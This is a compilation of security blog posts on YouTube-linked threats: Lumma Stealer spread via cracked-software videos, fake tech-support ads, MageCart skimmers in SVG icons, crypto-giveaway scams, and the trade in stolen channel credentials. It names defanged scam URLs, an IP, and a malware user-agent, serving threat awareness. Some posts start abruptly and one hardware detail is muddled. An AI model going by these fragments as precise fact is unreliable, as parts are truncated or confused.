YouTube Videos Promoting Malware

Concerning a development in the cybersecurity world, researchers have identified a new threat targeting freeloaders via YouTube videos. These videos are seemingly harmless and offer cracked versions of popular software. But as it turns out, these videos distribute a potent malware known as Lumma Stealer.

Besides being published some time ago, the video keeps gaining popularity. As researchers say, the file offered on the video as a cracked program is getting updated, meaning that hackers could have started spreading malicious payloads only after the video became popular. Also, such an approach opens the ability to spread effectively any malware, with Lumma being a firstling.

The Attack Chain

The attack begins innocently, with users searching for cracked versions of popular software like Vegas Pro. A link in the video description tempts the user, leading to a bogus installer hosted on a service like MediaFire. But the real danger lies within. The unpacked ZIP installer contains a Windows shortcut masquerading as a setup file.

In fact, the “setup” is a .lnk file that runs a PowerShell script. Then, things happen as in the textbook: the script downloads and runs the payload from a GitHub repository. The latter is chosen as a source for malware with firewall circumvention in mind.

What is Lumma Stealer?

Lumma Stealer is an information-stealing malware written in C language. It has been available on Russian-speaking forums since August 2022 through a Malware-as-a-Service (MaaS) model. The threat actor behind this malware is believed to be “Shamel”, who operates under the alias “Lumma”. The primary targets of Lumma Stealer are cryptocurrency wallets and two-factor authentication (2FA) browser extensions.

Once the malware infiltrates the victim’s machine, it steals sensitive information. It exfiltrates it to a C2 server via HTTP POST requests using the user agent “TeslaBrowser/5.5”. Along with these features, the malware also has a non-resident loader capable of delivering additional payloads through EXE, DLL, and PowerShell.

The Lumma Stealer has a starting price of $250 per month on underground forums. The lowest plan allows users to view and upload logs and access log analysis tools. On the other hand, the most expensive plan costs US$20,000 and gives users access to the source code. It also grants them the right to sell the infostealer.

How to stay protected?

First, we recommend that you refrain from downloading and using pirated software. This applies both to downloading from torrents and other sources. It is illegal for both home users and especially corporations and the risks – well, you may see them above. Still, you can enhance your protection against malware like Lumma Stealer by following tips:

• Avoid shady software spreading websites. Regardless of what kind of software they spread, the chance of getting infected by using one is noticeably higher. Seek a more reliable source – it will save you both time and money. To verify whether the site is legit and trustworthy, consider using GridinSoft Free Online Virus Checker.
• Don’t click on suspicious links. Similarly to the previous advice, be cautious with links, especially in emails, social media messages, or websites. Cybercriminals often rely on human curiosity to spread malware.
• Use anti-malware protection. A reliable anti-malware program and ensure it’s always up-to-date. It can detect threats before they harm your system. GridinSoft Anti-Malware is a security solution you can rely on.

The post YouTube Videos Promote Software Cracks With Lumma Stealer appeared first on Gridinsoft Blog.

Users have found that Pixel smartphones powered by Google Tensor processors are rebooting when user is trying to watch a clip from the movie “Alien” on YouTube in 4K HDR.

Let me remind you that we also wrote that Janet Jackson Song Killed Hard Drives on Old Laptops, as well as Cellmate men’s chastity belts are vulnerable to attacks and dangerous for users.

Also the media wrote that Bypassing the Lock Screen on Pixel Smartphones Netted a Researcher $70,000.

A strange issue was reported by users on the Google Pixel subreddit. So, a person with the nickname OGPixel5 writes that when you try to watch this video on YouTube, Google Pixel 6, 6a and Pixel 7 smartphones instantly reboot. Something in this video has an extremely negative effect on the devices, as they go into reboot without having time to show their owner a single frame.

At the same time, other users note that after a reboot, for some reason, cellular communication does not work, and in order to activate it again, you will need to restart the device again, but manually.

The main theory of users is that something in the video format (it’s 4K HDR) is causing smartphones to crash. Similar errors have happened before, for example, in 2020 there was a lot of discussion about “cursed wallpapers” that crashed when set as a background (the problem was a color space error).

All phones affected by this bug use Tensor SoC from Google Exynos, so the problem does not appear on other devices. It is likely that Samsung Exynos-based devices can also experience crashes, but so far no one has reported such problems.

For the first time, information about the reboot-inducing YouTube video appeared on the network last weekend, and today ArsTechnica journalists reported that the developers seem to have already fixed this bug. The publication reported that yesterday, the Pixel 7 Pro available to the editors instantly turned off when trying to open a video, and today it plays it normally. Several users on the Pixel subreddit have also reported that the video is working fine now.

Although users and journalists did not find updates to the application and other signs of the release of any “patch”, the publication notes that Google may well remotely influence the operation of smartphones without actually installing updates.

The post YouTube Video Causes Pixel Smartphones to Reboot appeared first on Gridinsoft Blog.

Let me remind you that we wrote that Companies in the EU will have to remove Google Analytics from their websites, and also that Google Has Disabled Some of the Global Cache Servers in Russia.

When searched for “YouTube“, the first ad contains the correct youtube.com URL and shows additional ads below the link.

However, the link will take you to a Windows Defender tech support phishing page.

The scam sites are located at the URLs “http://matkir[.]ml” and “http://159.223.199[.]181/” and warns visitors that “Windows has been locked down due to questionable activity” as well as that “Windows Defender detected a Trojan spyware called Ads.financetrack(2).dll“.

If the user is using a VPN, the site will redirect them to the official YouTube website. When calling the specified number, the “support specialist” offered to download and install TeamViewer on the device. The scammer is likely using TeamViewer to take control of the victim’s computer in order to “fix” the bug.

In most cases, the scammer will block the device or report that the computer is infected and you need to purchase a license for technical support. Currently, the malicious campaign is still ongoing in Google search. Google has not commented on this situation.

The most popular search terms used for the campaign are:

1. YouTube;
2. Amazon;
3. Facebook;
4. Walmart.

The post Fraudsters Are Running a Malicious Advertising Campaign through Google Search appeared first on Gridinsoft Blog.

Let me remind you that initially the name MageCart was assigned to one hack group, which was the first to introduce web skimmers (malicious JavaScript) on the pages of online stores to steal bank card data. Surprisingly, this approach turned out to be so successful that the group soon had numerous imitators, the name MageCart became a household name, and now it is assigned to all the class of such attacks.

Steganography means hiding information within another format (for example, text within images, images within videos, and so on).

Operators of web skimmers also did not stay away from this trend and hid their malicious code in website logos, product images or in the favicon of the infected resources.

Now, Sanguine Security experts write that SVG files, rather than PNG or JPG files, are used in new attacks to hide malicious code. Most likely, this is due to the fact that recently, protective solutions have become better at detecting skimmers in ordinary pictures.

In theory, it should be easier to detect malicious code in vector images. However, the researchers write that attackers are smart and designed their payload with these nuances in mind.

According to experts, hackers tested this technique back in June, and it was discovered on active e-commerce sites in September, with malicious payloads hidden inside buttons designed to publish content on social networks (Google, Facebook, Twitter, Instagram, YouTube, Pinterest etc).

In infected stores, as soon as users navigated to the checkout page, a secondary component (called a decoder) reads the malicious code hidden inside social media icons and then downloaded a keylogger that would capture and steal bank card information from the checkout form.

What could be next, I told, for example, in a note: Magecart groupings extract stolen cards data via the Telegram.

The post Hackers hide MageCart skimmers in social media buttons appeared first on Gridinsoft Blog.

The fact is that scammers are very fond of using names of famous people in their scams. For example, last month, attackers hijacked three fairly popular YouTube channels and gave them new names associated with SpaceX. Then the scammers launched fake “live broadcasts” with Elon Musk, during which they carried out fictitious distribution of bitcoins.

Thus, the cybercriminals lured more than $150,000 in cryptocurrency from users in just two days.

By the way, I talked that on hacker forums noticed growing demand for credentials from YouTube channels.

Similarly, attackers often exploit names of other famous personalities, including Stephen Wozniak, Bill Gates, and so on. By showing videos in which celebrities discuss cryptocurrencies and blockchain-related topics, the scammers ask viewers to send them a small amount of cryptocurrency, promising to double and return any amount received.

Along with Wozniak, there are more than a dozen of plaintiffs in this case who were deceived by such scammers and lost bitcoins (from a few dollars to $40,000). They argue that YouTube isn’t doing enough detect such scams on its platform. For example, Wozniak’s wife, Janet, told ArsTechnica reporters that since May of this year, she has repeatedly contacted YouTube because of such scammers.

“YouTube has all the necessary tools to detect and suppress such undesirable actions, but the company does not even take obvious steps for this (for example, it does not filter videos that include phrases such as “bitcoins giveaway” in their titles)”, – claim the plaintiffs.

The lawsuit also mentions Twitter, as scammers also regularly used the platform for similar purposes. However, in recent years, Twitter has been actively fighting such a scam, and the plaintiffs believe that the “repression” on Twitter pushed the scammers to go to YouTube, where they have been at ease for many years.

The plaintiffs also argue that YouTube is not just passively allows posting of such videos. YouTube’s recommendation algorithms have promoted these videos to crypto enthusiasts, and ads have been embedded in the videos, meaning the platform has been making direct profits from the fraudulent videos.

ArsTechnica journalists point out that in this case, YouTube protects section 230 of the Communication Decency Act. Essentially, the law grants online platforms immunity when it comes to inappropriate user content.

“Sites has immunity even if they do little to combat unwanted user content”, – tell ArsTechnica journalists.

The publication reminds that courts usually rely on section 230, even in cases where users distribute child pornography. It is unlikely that this time the court will look at the problem differently, although the name of Steven Wozniak may play iits role, and perhaps YouTube will take the problem of cryptocurrency scam more seriously.

The post Steve Wozniak Sues YouTube Over Cryptocurrency Scammers appeared first on Gridinsoft Blog.

On hacker forums and sites that sale credentials, you can find more and more offers of this kind.

It should be noted that cybercriminals for a long time were interested in YouTube, because the site provides them with a new audience that can be used in a variety of ways, from fraud to advertising. In addition, attackers often “steal” popular channels from their rightful owners, and then demand a ransom for the return of access.

“The data on YouTube channels is mainly collected from computers infected with malware, as a result of phishing campaigns and so on. After the stolen information is sorted into specific logins and passwords from certain services, and then sold on the black market”, — said IntSights researchers.

The cost of listings for sale with recorded data from YouTube channels is proportional to the number of subscribers. Researchers give some examples. So, in one case, the price for a channel with 200,000 subscribers began at $1,000 and increased in increments of $200.

In another case, the researchers found an auction advertisement, in which they sold data from 990,000 active channels, and the price started at $1,500 (the one who paid $2,500 received a list without bidding). Obviously, the seller was hoping to make money quickly by selling the data, as he was afraid that his victims would notice compromise, turn to support and regain access to their accounts.

Another set of 687 YouTube accounts, sorted by the number of subscribers, was put up for sale at an initial price of $400 (the price increased in increments of $100, and for $5,000 a lot could be withdrawn immediately).

IntSights experts believe that hackers are likely to collect material for such lists with credentials from YouTube channels, checking databases with stolen logins and passwords (in search of data from Google accounts) and data received from infected computers.

IntSights experts write that earlier cybercriminals used sophisticated phishing campaigns and reverse proxy toolkits to spoof Google’s two-factor authentication. Now sellers rarely mention 2FA, and most likely this suggests that the hijacked accounts were not protected by two-factor authentication.

Bleeping Computer magazine notes that users who suffered from hacking and hijacking an account on YouTube often complain that they tricked them into downloading the malware. For example, in the network you can find such complaints:

“They pretended to be YouTube sponsors, and when I tried to access their site, a keylogger / spyware was uploaded to my browser. For a maximum of a couple of minutes, they changed my password, deleted my devices, deleted my phone number and email used for recovery. Then they tried to extort money from me, they wanted me to send them BTC, or they will sell my channel.”

Another scam victim tells a similar story when scammers pretended to be looking for people to collaborate on.

For example, I told you that MyKingz botnet uses Taylor Swift photo to infect target machines. Just a good photo)

The post Hacker forums show growing demand for credentials from YouTube channels appeared first on Gridinsoft Blog.